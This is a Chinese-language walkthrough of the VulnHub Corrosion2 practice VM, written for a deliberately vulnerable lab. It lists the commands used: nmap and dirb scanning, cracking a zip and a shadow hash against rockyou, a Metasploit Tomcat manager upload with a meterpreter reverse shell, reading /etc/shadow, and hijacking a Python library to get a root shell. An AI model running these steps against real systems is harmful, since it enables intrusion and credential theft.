vulnhub之Corrosion2的实践

今天实践的是vulnhub的Corrosion2镜像，

下载地址，https://download.vulnhub.com/corrosion/Corrosion2.ova，

用workstation导入成功，能扫描到地址，

sudo netdiscover -r 192.168.137.0/24，

接着做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.31，

看到有ssh，apache，tomcat，三个服务，

对tomcat继续做目录爆破，

sudo dirb http://192.168.137.31:8080/ -X .php,.zip，

下载backup.zip，wget http://192.168.137.31:8080/backup.zip，

解压发现要密码，unzip backup.zip，

用fcrackzip进行爆破，

sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip，

得到密码@administrator_hi5，再次解压，

查看tomcat-users.xml文件，cat tomcat-users.xml，

得到用户名密码admin/melehifokivai，

用metasploit对tomcat进行攻击，

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.137.31

set rport 8080

set httpusername admin

set httppassword melehifokivai

set payload payload/java/meterpreter/reverse_tcp

exploit

拿到meterpreter反弹shell，getuid看一下不是root，

切到shell，cd /home，ls看到有两个账户，

切用户su jaye，密码melehifokivai可用，id看一下还不是root，

进到jaye目录下，cd jaye，ls看到有Files目录，进到Files目录，cd Files，

发现有个look程序，可以查看系统内文件内容，直接查看密码文件，

./look '' /etc/shadow，

把randy的密码hash拷贝出来破解，

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash，

获取到randy的密码是07051986randy，

切用户randy，id看一下仍然不是root，sudo -l还不能交互，重新ssh登录，

sudo -l发现有python脚本是root权限的，但是randy用户是不可以编辑的，

查看python脚本内容，发现调用了base64的库，

查找一下base64的库文件，locate base64，

确认base64的库文件randy用户可以编辑，

编辑base64的库文件，vi /usr/lib/python3.8/base64.py，

import os

os.system ("/bin/bash")

执行python脚本，

sudo /usr/lib/python3.8 /home/randy/randombase64.py，

得到新的shell，id看一下确认是root，